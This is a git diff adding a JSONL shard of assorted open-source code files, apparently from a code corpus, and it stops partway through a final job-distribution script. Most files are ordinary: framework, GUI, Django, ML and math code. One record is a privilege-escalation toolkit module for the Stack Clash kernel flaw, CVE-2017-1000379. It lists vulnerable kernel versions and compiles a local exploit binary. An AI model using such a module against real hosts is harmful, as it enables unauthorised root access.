diff --git "a/4899.jsonl" "b/4899.jsonl" new file mode 100644--- /dev/null +++ "b/4899.jsonl" @@ -0,0 +1,665 @@ +{"seq_id":"22017132","text":"from functools import update_wrapper\nimport logging\nimport sys\nfrom .config import Configurable, Directive, commit, create_code_info\nfrom .compat import with_metaclass\n\n\nclass Config(object):\n \"\"\"The object that contains the configurations.\n\n The configurations are specified by the :attr:`Action.config`\n class attribute of :class:`Action`.\n \"\"\"\n pass\n\n\nclass AppMeta(type):\n \"\"\"Dectate metaclass.\n\n Sets up ``config`` and ``dectate`` class attributes.\n\n Keeps track of all :class:`App` subclasses.\n \"\"\"\n def __new__(cls, name, bases, d):\n extends = [base.dectate for base in bases\n if hasattr(base, 'dectate')]\n d['config'] = config = Config()\n d['dectate'] = configurable = Configurable(extends, config)\n result = super(AppMeta, cls).__new__(cls, name, bases, d)\n configurable.app_class = result\n return result\n\n\nclass App(with_metaclass(AppMeta)):\n \"\"\"A configurable application object.\n\n Subclass this in your framework and add directives using\n the :meth:`App.directive` decorator.\n\n Set the ``logger_name`` class attribute to the logging prefix\n that Dectate should log to. By default it is ``\"dectate.directive\"``.\n \"\"\"\n logger_name = 'dectate.directive'\n \"\"\"The prefix to use for directive debug logging.\"\"\"\n\n dectate = None\n \"\"\"A dectate Configurable instance is installed here.\n\n This is installed when the class object is initialized, so during\n import-time when you use the ``class`` statement and subclass\n :class:`dectate.App`.\n\n This keeps tracks of the registrations done by using directives as long\n as committed configurations.\n \"\"\"\n\n config = None\n \"\"\"Config object that contains the configuration after commit.\n\n This is installed when the class object is initialized, so during\n import-time when you use the ``class`` statement and subclass\n :class:`dectate.App`, but is only filled after you commit the\n configuration.\n\n This keeps the final configuration result after commit. It is\n a very dumb object that has no methods and is just a container for\n attributes that contain the real configuration.\n \"\"\"\n\n @classmethod\n def directive(cls, name):\n \"\"\"Decorator to register a new directive with this application class.\n\n You use this as a class decorator for a\n :class:`dectate.Action` or a :class:`dectate.Composite`\n subclass::\n\n @MyApp.directive('my_directive')\n class FooAction(dectate.Action):\n ...\n\n This needs to be executed *before* the directive is used and\n thus might introduce import dependency issues unlike normal\n Dectate configuration, so beware! 
An easy way to make sure\n        that all directives are installed before you use them is to\n        make sure you define them in the same module as where you\n        define the :class:`App` subclass that has them.\n\n        :param name: the name of the directive to register.\n        :return: a directive that when called installs the directive\n          method on the class.\n        \"\"\"\n        return DirectiveDirective(cls, name)\n\n    @classmethod\n    def private_action_class(cls, action_class):\n        \"\"\"Register a private action class.\n\n        In some cases action classes can be an implementation detail,\n        for instance in the implementation of a Composite action.\n\n        In this case you want the action class to be registered\n        but not have a directive associated with it.\n\n        This function may be used as a decorator like this::\n\n          @App.private_action_class\n          class MyActionClass(dectate.Action):\n              ...\n\n        :param action_class: the :class:`dectate.Action` subclass to register.\n        :return: the :class:`dectate.Action` class that was registered.\n        \"\"\"\n        cls.dectate.register_action_class(action_class)\n        return action_class\n\n    @classmethod\n    def commit(cls):\n        \"\"\"Commit this class and any classes depending on it.\n\n        This is intended to be overridden by subclasses if committing\n        the class also commits other classes automatically, such as in\n        the case in Morepath when one app is mounted into another. In\n        such a case it should return an iterable of all committed\n        classes.\n\n        :return: an iterable of committed classes\n        \"\"\"\n        commit(cls)\n        return [cls]\n\n    @classmethod\n    def is_committed(cls):\n        \"\"\"True if this app class was ever committed.\n\n        :return: bool that is ``True`` when the app was committed before.\n        \"\"\"\n        return cls.dectate.committed\n\n\nclass DirectiveDirective(object):\n    \"\"\"Implementation of the ``directive`` directive.\n\n    :param cls: the class that this directive is registered on.\n    :param name: the name of the directive.\n    \"\"\"\n    def __init__(self, cls, name):\n        self.cls = cls\n        self.name = name\n\n    def __call__(self, action_factory):\n        \"\"\"Register the directive with the app class.\n\n        Creates a class method on the app class for the directive.\n\n        :param action_factory: the :class:`dectate.Action` or\n          :class:`dectate.Composite` subclass to register.\n        :return: the action or composite subclass that was registered.\n        \"\"\"\n        directive_name = self.name\n\n        def method(cls, *args, **kw):\n            frame = sys._getframe(1)\n            code_info = create_code_info(frame)\n            logger = logging.getLogger('%s.%s' %\n                                       (cls.logger_name, directive_name))\n            return Directive(cls, action_factory, args, kw,\n                             code_info, directive_name, logger)\n        method.action_factory = action_factory # to help sphinxext\n        setattr(self.cls, self.name, classmethod(method))\n        method.__name__ = self.name\n        method.__doc__ = action_factory.__doc__\n        method.__module__ = action_factory.__module__\n        self.cls.dectate.register_action_class(action_factory)\n        return action_factory\n","sub_path":"dectate/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"340304749","text":"import webbrowser\nimport tkinter as tk\nfrom system.gui.widgets.factory import create_widget\nfrom system.params import VERSION, COPYRIGHT\n\n\nclass HelpMenu:\n\n    def __init__(self, master_menu):\n\n        self.menu = tk.Menu(master=master_menu, tearoff=0)\n        master_menu.add_cascade(label='Help', menu=self.menu)\n        self.menu.add_command(label='Version')\n        self.menu.add_command(label='Documentation')\n        
self.menu.add_command(label='Github')\n        self.menu.add_command(label='Contact')\n        self.menu.entryconfig(0, command=self.show_version)\n        self.menu.entryconfig(1, command=self.show_docs)\n        self.menu.entryconfig(2, command=self.show_github)\n        self.menu.entryconfig(3, command=self.show_contact)\n\n    def show_version(self):\n\n        window = create_widget('toplevel', master=self.menu, title='Version')\n        create_widget('logo', master=window, row=0, column=0)\n        create_widget('label', master=window, row=1, column=0, text=f'Version {VERSION}', sticky=None)\n        create_widget('label', master=window, row=2, column=0, text=COPYRIGHT, sticky=None)\n\n    def show_docs(self):\n\n        webbrowser.open('https://autooed.readthedocs.io')\n\n    def show_github(self):\n\n        webbrowser.open('https://github.com/yunshengtian/AutoOED')\n\n    def show_contact(self):\n\n        webbrowser.open('mailto:autooed@csail.mit.edu')\n","sub_path":"system/gui/modules/help_menu.py","file_name":"help_menu.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"265204942","text":"import FWCore.ParameterSet.Config as cms\n\nphotonMaker = cms.EDProducer(\"PhotonMaker\",\n\taliasPrefix = cms.untracked.string(\"photons\"),\n    minEt = cms.double(10.), #gev, min to keep\n    # Photon collection\n    photonsInputTag = cms.InputTag(\"photons\"),\n    ecalRecHitsInputTag_EE = cms.InputTag(\"ecalRecHit\",\"EcalRecHitsEE\"),\n    ecalRecHitsInputTag_EB = cms.InputTag(\"ecalRecHit\",\"EcalRecHitsEB\"),\n    cms2scsseeddetidInputTag = cms.InputTag(\"scMaker\"),\n)\n\n","sub_path":"NtupleMaker/python/photonMaker_cfi.py","file_name":"photonMaker_cfi.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"14520428","text":"from django.conf import settings\nimport pymongo\nimport logging\nlogger = logging.getLogger('giviu')\n\n\ndef connect():\n    try:\n        mongo = pymongo.MongoClient(settings.SOCIAL['MONGO_HOST'])\n    except pymongo.errors.ConnectionFailure:\n        logger.critical('Unable to connect to social mongo on ' +\n                        settings.SOCIAL['MONGO_HOST'])\n        return None\n    return mongo.eve\n\n\ndef add_external_codes_for_giftcard(giftcard, external_codes):\n    client = connect()\n    if not client:\n        return None\n\n    ecs = []\n    for ec in external_codes:\n        ecs.append({'status': 'available',\n                    'giftcard_id': giftcard,\n                    'code': ec})\n    client.external_codes.insert(ecs)\n\n\ndef get_external_codes_for_giftcard(giftcard):\n    client = connect()\n    if not client:\n        return None\n\n    ecode = client.external_codes.find_one({'giftcard_id': giftcard.id,\n                                            'status': 'available'})\n    if not ecode:\n        logger.warning('No external codes for giftcard id: ' + str(giftcard.id))\n        return None\n\n    client.external_codes.update({'_id': ecode['_id']},\n                                 {'$set': {'status': 'used'}})\n    return ecode['code']\n","sub_path":"giviu/external_codes/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"253724016","text":"a = input(\"α=\")\r\nb = input(\"β=\")\r\nc = input(\"γ=\")\r\nprint (\"We will solve the equation: \")\r\nprint (\"{}x**2 + {}x + {} = 0\\n\".format(a,b,c))\r\na = float(a)\r\nb = float(b)\r\nc = float(c)\r\n\r\nif a == 0 :\r\n    if b == 0 :\r\n        if c == 0 :\r\n            print(\"There are infinitely many solutions\")\r\n        else :\r\n            print(\"There are no solutions\")\r\n    else :\r\n        print (\"The solutions are x1 = x2 = {:1.2f}\".format( - c/b ))\r\nelse :\r\n    
diak = b**2 - 4 * a * c\r\n    print(\"The discriminant is {:1.2f}\".format(diak))\r\n\r\n    if diak < 0 :\r\n        print(\"The equation has no real solutions\")\r\n    else :\r\n        x1 = (-b + diak**0.5)/(2*a)\r\n        x2 = (-b - diak**0.5)/(2*a)\r\n        print(\"The solutions are: x1 = {:1.2f}, x2 = {:1.2f}\".format(x1,x2))\r\n","sub_path":"Python/Introduction to Python-Mathesis Course/Week 2/v7.2.py","file_name":"v7.2.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"525937223","text":"import pddlpy\nimport sys\nimport copy\nfrom plan_executor import Executor\nfrom Search import *\n\n\nALPHA = 1.0\n\nclass Problem:\n\n    def __init__(self, robot_domain_model, robot_problem, plan_file, explanatory_actions_file, max_expl_length):\n\n        exc = Executor(robot_domain_model, robot_problem, plan_file)\n        self.orig_beh_trace = copy.deepcopy(exc.get_beh_trace())\n        self.max_expl_length = max_expl_length\n        \n        with open(explanatory_actions_file) as e_fd:\n            self.action_set = set([a.strip() for a in e_fd.readlines()])\n\n\n    def explain(self):\n        start_state = SearchNode(set(), self.action_set, [], self.orig_beh_trace, ALPHA)\n\n        final_explanation = Exhaustive_Search(start_state, self.max_expl_length)\n\n        return final_explanation.prefix\n\n\n\n","sub_path":"CRF_Implementation/Explanation_Generator/src/Problem.py","file_name":"Problem.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"645181015","text":"\"\"\"\nhttps://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt\n\"\"\"\nimport os\nfrom exploits.exploit import LinuxExploit\nfrom src.kernels import KernelWindow\nfrom constants import color_print, UBUNTU_17, UBUNTU_16, UBUNTU_14, DEBIAN_9, DEBIAN_8, DEBIAN_7, FEDORA, CENTOS, \\\n\tCONFIRMED_VULNERABLE, HIGH_RELIABILITY, ARCHITECTURE_amd64, PLAYGROUND_PATH, LINUX_EXPLOIT_SOURCE_PATH\n\nclass CVE20171000379(LinuxExploit):\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.name = \"CVE20171000379\"\n\t\tself.formatted_name = \"CVE-2017-1000379\"\n\t\tself.type = \"linux\"\n\t\tself.brief_desc = \"Stack clash vulnerability from qualys \"\n\t\tself.reliability = HIGH_RELIABILITY\n\t\tself.vulnerable_kernels = [\n\t\t\tKernelWindow(UBUNTU_17, CONFIRMED_VULNERABLE, 0, 0, 0, 4, 11, 5),\n\t\t\tKernelWindow(UBUNTU_16, CONFIRMED_VULNERABLE, 0, 0, 0, 4, 11, 5),\n\t\t\tKernelWindow(UBUNTU_14, CONFIRMED_VULNERABLE, 0, 0, 0, 4, 11, 5),\n\t\t\tKernelWindow(DEBIAN_9, CONFIRMED_VULNERABLE, 0, 0, 0, 4, 11, 5),\n\t\t\tKernelWindow(DEBIAN_8, CONFIRMED_VULNERABLE, 0, 0, 0, 4, 11, 5),\n\t\t\tKernelWindow(DEBIAN_7, CONFIRMED_VULNERABLE, 0, 0, 0, 4, 11, 5),\n\t\t\tKernelWindow(FEDORA, CONFIRMED_VULNERABLE, 0, 0, 0, 4, 11, 5),\n\t\t\tKernelWindow(CENTOS, CONFIRMED_VULNERABLE, 0, 0, 0, 4, 11, 5)\n\t\t]\n\t\tself.architecture = ARCHITECTURE_amd64\n\t\tself.source_c_path = os.path.join(LINUX_EXPLOIT_SOURCE_PATH, \"{}.c\".format(self.name))\n\t\tself.compilation_path = os.path.join(PLAYGROUND_PATH, self.name)\n\t\tself.compilation_command = \"gcc -o {} {}\".format(self.compilation_path, self.source_c_path)\n\t\tself.exploit_command = self.compilation_path\n\n\tdef determine_vulnerability(self):\n\t\tcolor_print(\"\\t[*] checking exploitation prerequisites for {}\".format(self.name), color=\"blue\")\n\t\t# if the kernel matches, it should be vulnerable\n\t\tcolor_print(\"\\t[+] system appears to be vulnerable to {}\".format(self.name), 
color=\"green\")\n\t\treturn True\n\n\tdef exploit(self):\n\t\tself.exploit_failure(\"this requires manual exploitation. review source at {}\".format(self.source_c_path))\n","sub_path":"exploits/linux/CVE20171000379.py","file_name":"CVE20171000379.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"153692578","text":"# -*- coding: utf-8 -*-\nimport urllib\nimport send_text\ndef read_text():\n\tquotes = open(\"/home/rafaqtro/udacity/Programming Foundations with Python /proyecto final/Profanity Editor/texto.txt\",\"r\")\n\tcontents_of_file = quotes.readlines()\n\tquotes.close()\n\tchequear_groserias(contents_of_file)\n\n\ndef chequear_groserias(texto_a_chequear):\n\tgroserias = [\"marico\", \"puta\", \"coño\", \"cabron\", \"hijoputa\", \"coño de tu madre\",\"pendejo\", \"Coño\", \"maldito\",\"maldita\"]\n\tfor x in texto_a_chequear:\n\t\tfor i in groserias:\n\t\t\tif i in x:\t\n\t\t\t\tsend_text.send_sms() \n\t\t\t\tbreak\nread_text()\n\n","sub_path":"Profanity Editor/check_profanity.py","file_name":"check_profanity.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"81693297","text":"import json\nimport httplib\nfrom os import path\nfrom django.http import HttpResponse\nfrom django.shortcuts import redirect, get_object_or_404\nfrom django.forms.models import model_to_dict\nfrom django.views.decorators.http import require_GET\nfrom datetime import datetime\nfrom hashtags_battle.models import Battle\n\nNO_RESULT_MESSAGE = 'No results yet'\n\n\n@require_GET\ndef battles(request):\n \"\"\"\n Returns all battles\n @param request:\n @return:\n \"\"\"\n data = [{'id': b.id, 'url': request.build_absolute_uri(path.join(request.get_full_path(), str(b.id)))} for b in\n Battle.objects.all()]\n response = {'url': request.build_absolute_uri(),\n 'count': len(data),\n 'data': data,\n 'status': httplib.OK}\n return HttpResponse(json.dumps(response))\n\n\n@require_GET\ndef battle_by_id(request, battle_id):\n \"\"\"\n Returns single battle resource\n @param request:\n @param battle_id: id of the battle\n @return: HttpResponse\n \"\"\"\n battle = get_object_or_404(Battle, id=battle_id)\n data = model_to_dict(battle)\n hashtags = []\n for hashtag in battle.hashtags.all():\n battle_dict = model_to_dict(hashtag)\n try:\n result = hashtag.result_set.filter(battle=battle).all()[0].typos\n except IndexError:\n result = NO_RESULT_MESSAGE\n battle_dict['typos'] = result\n hashtags.append(battle_dict)\n data['hashtags'] = hashtags\n data['winner'] = battle.winner\n response = {'url': request.build_absolute_uri(),\n 'data': data,\n 'status': httplib.OK}\n\n def date_handler(obj):\n \"\"\"\n Handles datetime objects, which json dumper do not know how to deal with\n @param obj:\n @return:\n \"\"\"\n return obj.isoformat() if isinstance(obj, datetime) else obj\n\n return HttpResponse(json.dumps(response, default=date_handler))\n\n\n@require_GET\ndef index(request):\n \"\"\"\n Index just redirects to battles, as there is nothing else available here for now...\n @param request:\n @return:\n \"\"\"\n return redirect(battles)\n","sub_path":"hashtags_battle/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"119760457","text":"import services.pipelines.Task as task\n\nclass TestTask(task.Task):\n def exec(self, 
task_input, task_output):\n        sinus_rythm_count = self.instances(task_input[\"fantasia_test_loc\"]) + self.instances(task_input[\"nsr_test_loc\"])\n\n        af_rythm_count = self.instances(task_input[\"ltaf_test_loc\"])\n\n        ratio = af_rythm_count // sinus_rythm_count\n\n        with open(task_input[\"test_loc\"], 'w') as training_file:\n            training_labels = open(task_input[\"labels_test_loc\"], 'w')\n            training_labels.write(\"sinus,af\\n\")\n\n            nsr = open(task_input[\"nsr_test_loc\"])\n            fantasia = open(task_input[\"fantasia_test_loc\"])\n            ltaf = open(task_input[\"ltaf_test_loc\"]) \n\n            training_file.write(ltaf.readline())\n            \n            nsr.readline()\n            fantasia.readline()\n\n            nsr_read = nsr.readline()\n            fantasia_read = fantasia.readline()\n            ltaf_read = ltaf.readline()\n\n            while nsr_read != \"\" and ltaf_read != \"\" and fantasia_read != \"\":\n                index_counter = 0\n\n                while index_counter < 2000 and fantasia_read != \"\":\n                    training_file.write(fantasia_read)\n                    training_labels.write(\"1,0\\n\")\n\n                    fantasia_read = fantasia.readline()\n\n                    index_counter += 1\n\n                index_ltaf = 0\n\n                while index_ltaf < index_counter and ltaf_read != \"\":\n                    training_file.write(ltaf_read)\n                    training_labels.write(\"0,1\\n\")\n\n                    for _ in range(0, (ratio - 1)):\n                        ltaf.readline()\n\n                    ltaf_read = ltaf.readline()\n                    index_ltaf += 1\n                \n                index_nsr = 0\n\n                while index_nsr < index_ltaf and nsr_read != \"\":\n                    training_file.write(nsr_read)\n                    training_labels.write(\"1,0\\n\")\n\n                    nsr_read = nsr.readline()\n\n                    index_nsr += 1\n                \n                index_ltaf = 0\n\n                while index_ltaf < index_counter and ltaf_read != \"\":\n                    training_file.write(ltaf_read)\n                    training_labels.write(\"0,1\\n\")\n\n                    for _ in range(0, (ratio - 1)):\n                        ltaf.readline()\n\n                    ltaf_read = ltaf.readline()\n                    index_ltaf += 1\n                \n            while ltaf_read != \"\" and nsr_read != \"\":\n                index_nsr = 0\n\n                while index_nsr < 2000 and nsr_read != \"\":\n                    training_file.write(nsr_read)\n                    training_labels.write(\"1,0\\n\")\n\n                    nsr_read = nsr.readline()\n\n                    index_nsr += 1\n                \n                index_ltaf = 0\n\n                while index_ltaf < index_nsr and ltaf_read != \"\":\n                    training_file.write(ltaf_read)\n                    training_labels.write(\"0,1\\n\")\n\n                    for _ in range(0, (ratio - 1)):\n                        ltaf.readline()\n\n                    ltaf_read = ltaf.readline()\n                    index_ltaf += 1\n\n            nsr.close()\n            fantasia.close()\n            ltaf.close()\n            training_labels.close()\n\n    def reverse(self, task_input, task_output):\n        pass\n\n    def instances(self, path):\n        count = 0\n\n        with open(path) as data_file:\n            data_set = data_file.readline()\n\n            while data_set != \"\":\n                count += 1\n\n                data_set = data_file.readline()\n            \n        return count","sub_path":"Physionet/ML_sets/tasks/TestTask.py","file_name":"TestTask.py","file_ext":"py","file_size_in_byte":3590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"605315798","text":"#ROS and OpenCV don't play nice in python3\nimport sys\nif '/opt/ros/kinetic/lib/python2.7/dist-packages' in sys.path:\n    sys.path.remove('/opt/ros/kinetic/lib/python2.7/dist-packages')\n\n# import the necessary packages\nfrom sklearn.preprocessing import LabelBinarizer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report\n\nfrom preprocessing.imagetoarraypreprocessor import ImageToArrayPreprocessor\nfrom preprocessing.aspectawarepreprocessor import AspectAwarePreprocessor\nfrom datasets.simpleDatasetLoader import SimpleDatasetLoader\nfrom nn.conv.minivggnet import MiniVGGNet\n\nfrom tensorflow.keras.optimizers import SGD\nfrom imutils import paths\nimport matplotlib.pyplot as plt\nimport numpy 
as np \nimport argparse\nimport os\nimport cv2\n\n# construct the argument parser and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-d\",\"--dataset\",required=True,help=\"path to input dataset\")\nargs= vars(ap.parse_args())\n\n# grab the list of images that we'll be describing, then extract \n# the class label names from the image paths\n\nprint(\"[INFO] loading images...\")\nimagePaths=sorted(list(paths.list_images(args['dataset'])))\n\n#this is incredibly inefficient but oooooookkkk\nclassNames=np.unique([pt.split(os.path.sep)[-2] for pt in imagePaths])\n\n#initialize the image preprocessors\naap = AspectAwarePreprocessor(64,64)\niap = ImageToArrayPreprocessor()\n\n# load the dataset from disk and then scale the raw pixel intensities\n# to the range [0,1]\nsdl = SimpleDatasetLoader(preprocessors=[aap,iap])\n(data,labels) = sdl.load(imagePaths,verbose=50)\ndata=data.astype(\"float\") / 255.0\n\n# partition the data into training and testing splits using 75% of \n# the data for training and the remaining 25% for testing\n\n(trainX,testX,trainY,testY) = train_test_split(data,labels, test_size=0.25, random_state=42)\n\n# convert the labels from integers to vectors\n\ntrainY = LabelBinarizer().fit_transform(trainY)\ntestY = LabelBinarizer().fit_transform(testY)\n\n#Initialize the optimizer and model\nprint(\"[INFO] compiling model...\")\nopt = SGD(lr=0.05)\n\nmodel = MiniVGGNet.build(width=64,height=64,depth=3,classes=len(classNames))\nmodel.compile(loss=\"categorical_crossentropy\",optimizer=opt,metrics=['accuracy'])\nprint(model.summary())\n\n# Train the network\nprint(\"[INFO] training the network...\")\n\n#define how many epochs you want (I swear Imma make this a parameter)\nnum_epochs=100\nH= model.fit(trainX,trainY,validation_data=(testX,testY),batch_size=32,epochs=num_epochs,verbose=1)\n\n\n# evaluate the network\nprint(\"[INFO] evaluating network...\")\npredictions = model.predict(testX,batch_size=32)\nprint(classification_report(testY.argmax(axis=1),predictions.argmax(axis=1),target_names=classNames))\n# plot the training loss and accuracy\nplt.style.use(\"ggplot\")\nplt.figure()\nfor key in H.history.keys():\n    plt.plot(np.arange(0,num_epochs),H.history[key],label=key)\n\nplt.title(\"Training Loss and Accuracy\")\nplt.xlabel(\"Epoch #\")\nplt.ylabel(\"Loss/Accuracy\")\nplt.legend()\nplt.show()","sub_path":"Practioner_bundle/minivggnet_flowers17.py","file_name":"minivggnet_flowers17.py","file_ext":"py","file_size_in_byte":3015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"460414626","text":"import matplotlib; matplotlib.use('Agg') # Force matplotlib to not use any Xwindows backend; instead, writes files\r\nfrom matplotlib import pyplot as plt\r\nimport numpy as np\r\nimport csv\r\n\r\ndef distribute_jobs(n , k, dist_type='regular-soliton', params=[]):# machines_jobs_list = [[0, 1, 2], [1, 2], [2]]\r\n\t# machines_jobs_list = [[0, 1] ,[1]] # k2 n2\r\n\t# machines_jobs_list = [[0, 1,2] ,[1,2], [0], [2]] # k3 n4\r\n\t# machines_jobs_list = [[0, 1,2] ,[1,2], [0], [2,4], [3], [0,1], [4,5]] # k6 n7\r\n\t# return machines_jobs_list\r\n\t# import random; seed0 = random.randint(0,10000)\r\n\t# seed0 = 3635\r\n\t# print \"np seed\", seed0\r\n\t# np.random.seed(seed0)\r\n\t#---------------------\r\n\r\n\t# Nathan's distribution part\r\n\r\n\tif 'soliton' in dist_type:\r\n\t\t# Default\r\n\t\tif params == []: params = [8, 0.05]\r\n\t\tL, sing_frac = params[0], params[1]\r\n\r\n\t\t# Making soliton right 
degrees\r\n\t\tL_soliton = [0]*(L+1) # Pseudo 1-indexed\r\n\t\tfor i in range(2, L+1):\r\n\t\t\tL_soliton[i] = 1/float((i * (i-1)))\r\n\r\n\t\t# Adding some percentage of singletons, normalizing\r\n\t\tL_soliton = [(1-sing_frac)*a/sum(L_soliton) for a in L_soliton]\r\n\t\tL_soliton[1] = sing_frac\r\n\r\n\t\tnum_machines = [round(n*l) for l in L_soliton]\r\n\t\tnum_machines[1] += n - sum(num_machines)\r\n\r\n\t\tmachines = []\r\n\t\tfor d in range(len(num_machines)):\r\n\t\t\tmachines.extend([d for _ in range(int(num_machines[d]))])\r\n\r\n\r\n\t\tif dist_type == 'regular-soliton':\r\n\t\t\t# Making regular left degrees\r\n\t\t\tright_total = sum(machines)\r\n\t\t\tave_degree = np.floor(right_total / k)\r\n\t\t\tremainder = right_total - ave_degree*k\r\n\t\t\t\r\n\t\t\tjob_degrees = [ave_degree for _ in range(k)]\r\n\t\t\tfor i in range(int(remainder)): job_degrees[i] += 1\r\n\t\telif dist_type == 'irregular-soliton':\r\n\t\t\tjobs = range(k)\r\n\t\t\tmachines_jobs_list = []\r\n\t\t\tfor machine in machines:\r\n\t\t\t\tm_jobs = list(np.random.choice(jobs, size=machine, replace=False))\r\n\t\t\t\tmachines_jobs_list.append(m_jobs)\r\n\t\t\treturn machines_jobs_list\r\n\r\n\r\n\telif dist_type == 'regular-regular':\r\n\t\tif params == []: params = [3, 0.05]\r\n\t\tright_degree, sing_frac = params[0], params[1]\r\n\r\n\t\tmachines = [1 for _ in range(int(sing_frac*n))]\r\n\t\trest = n - int(sing_frac*n)\r\n\t\tmachines.extend([right_degree for _ in range(rest)])\r\n\r\n\t\t# Making regular left degrees\r\n\t\tright_total = sum(machines)\r\n\t\tave_degree = np.floor(right_total / k)\r\n\t\tremainder = right_total - ave_degree*k\r\n\t\t\r\n\t\tjob_degrees = [ave_degree for _ in range(k)]\r\n\t\tfor i in range(int(remainder)): job_degrees[i] += 1\r\n\r\n\t# Distributing\r\n\tall_jobs = []\r\n\tfor i in range(len(job_degrees)):\r\n\t\tlst = [i for _ in range(int(job_degrees[i]))]\r\n\t\tall_jobs.extend(lst)\r\n\tnp.random.shuffle(all_jobs)\r\n\r\n\t# Don't give machine same job twice\r\n\tsucceeded = False\r\n\twhile not succeeded:\r\n\t\tnp.random.shuffle(all_jobs)\r\n\t\tmachines_jobs_list = []\r\n\t\tfor machine in machines[::-1]:\r\n\t\t\tm_jobs, i, rem = [], 0, machine\r\n\t\t\twhile rem > 0:\r\n\t\t\t\tif i >= len(all_jobs):\r\n\t\t\t\t\trem = -1\r\n\t\t\t\telif all_jobs[i] not in m_jobs:\r\n\t\t\t\t\tm_jobs.append(all_jobs.pop(i))\r\n\t\t\t\t\trem -= 1\r\n\t\t\t\telse:\r\n\t\t\t\t\ti += 1\r\n\t\t\tmachines_jobs_list.append(m_jobs)\r\n\t\tif len(machines_jobs_list) == len(machines):\r\n\t\t\tsucceeded = True\r\n\t# print machines_jobs_list\r\n\treturn machines_jobs_list\r\n\r\ndef peel_T(machines_jobs_list, arrival_time, n, k, error_floor, get_decode_seq = False):\r\n\r\n\tjob_success = [False for _ in range(k)]\r\n\r\n\tdec_seq = np.identity(n , dtype = int) \r\n\tdec_ans = [(-1) for _ in range(k)] # decode answer machine number\r\n\r\n\r\n\tarrive_order = sorted(range(len(arrival_time)), key=lambda k: arrival_time[k]) # gets the index of sorted arrival_time list\r\n\r\n\tcurrent_machines_jobs_list = [[] for _ in range(n)]\r\n\t\r\n\t# peeling process\r\n\t\r\n\t# print \"arrive order\", arrive_order\r\n\r\n\r\n\tsuc_T = -1.0 # returns -1 if failed to succeed\r\n\r\n\tfor t_i in range(n):\r\n\t\tarrived_machine = arrive_order[t_i]\r\n\t\tcurrent_machines_jobs_list[arrived_machine] = list(machines_jobs_list[arrived_machine]) # copy, so peeling never mutates the input lists\r\n\t\t# print current_machines_jobs_list\r\n\t\t\r\n\r\n\t\t#try peeling\r\n\t\t# check singletons\r\n\t\tsingleton_exist = True\r\n\t\twhile singleton_exist:\r\n\t\t\tsingleton_exist = 
False\r\n\t\t\r\n\t\t\t# remove already known job edge from other machines (iterate over a copy while removing)\r\n\t\t\tfor m_i2 in range(len(current_machines_jobs_list)):\r\n\t\t\t\tfor job_i in list(current_machines_jobs_list[m_i2]):\r\n\t\t\t\t\tif job_success[job_i]:\r\n\t\t\t\t\t\tcurrent_machines_jobs_list[m_i2].remove(job_i) #peeling\r\n\t\t\t\t\t\tif get_decode_seq:\r\n\t\t\t\t\t\t\t# calculate decoding sequence \r\n\t\t\t\t\t\t\tdec_seq[m_i2] -= dec_seq[dec_ans[job_i]]\r\n\t\t\r\n\t\t\t# check singleton\r\n\t\t\tfor m_i in range(len(current_machines_jobs_list)): \r\n\t\t\t\tif (len(current_machines_jobs_list[m_i]) == 1):\r\n\t\t\t\t\tsingleton_exist = True\r\n\t\t\t\t\tjob_singleton = current_machines_jobs_list[m_i].pop()\r\n\t\t\t\t\tjob_success[job_singleton] = True\r\n\t\t\t\t\tif get_decode_seq:\r\n\t\t\t\t\t\tdec_ans[job_singleton] = m_i\r\n\r\n\r\n\t\t# print \"check singleton\", [job_i for job_i in range(len(job_success)) if job_success[job_i]==True] \r\n\t\t# print \"\"\r\n\r\n\t\tif sum(job_success) > (1- error_floor)*len(job_success):\r\n\t\t\tsuc_T = arrival_time[t_i]\r\n\t\t\tbreak\r\n\r\n\treturn suc_T, dec_seq, dec_ans\r\n\r\n\r\n\r\ndef save_machines_jobs_list(machines_jobs_list):\r\n\t# save machines_jobs_list as csv column list of (job_number, machine_number, local_master_rank)\r\n\tcsv_file = open(\"machines_jobs_list.csv\", \"w\")\r\n\tcw = csv.writer(csv_file , delimiter=',', quotechar='|')\r\n\r\n\tlocal_master_rank = 0\r\n\tfor i1 in range(len(machines_jobs_list)):\r\n\t\tfor i2 in range(len(machines_jobs_list[i1])):\r\n\t\t\tjob_number = machines_jobs_list[i1][i2]\r\n\t\t\tmachine_number = i1\r\n\t\t\tcw.writerow([str(job_number), str(machine_number), str(local_master_rank)])\r\n\t\tlocal_master_rank += len(machines_jobs_list[i1])\r\n\r\n\tcsv_file.close()\r\n\r\n\r\ndef read_machines_jobs_list(n, k):\r\n\t# read machines_jobs_list from csv column list of (job_number, machine_number, local_master_rank)\r\n\t# use rank = -1 to avoid providing local machine info\r\n\t\r\n\tmachines_jobs_list = [[] for i in range(n)]\r\n\tlocal_master_list = [-1 for i in range(n)] # indicates local master's 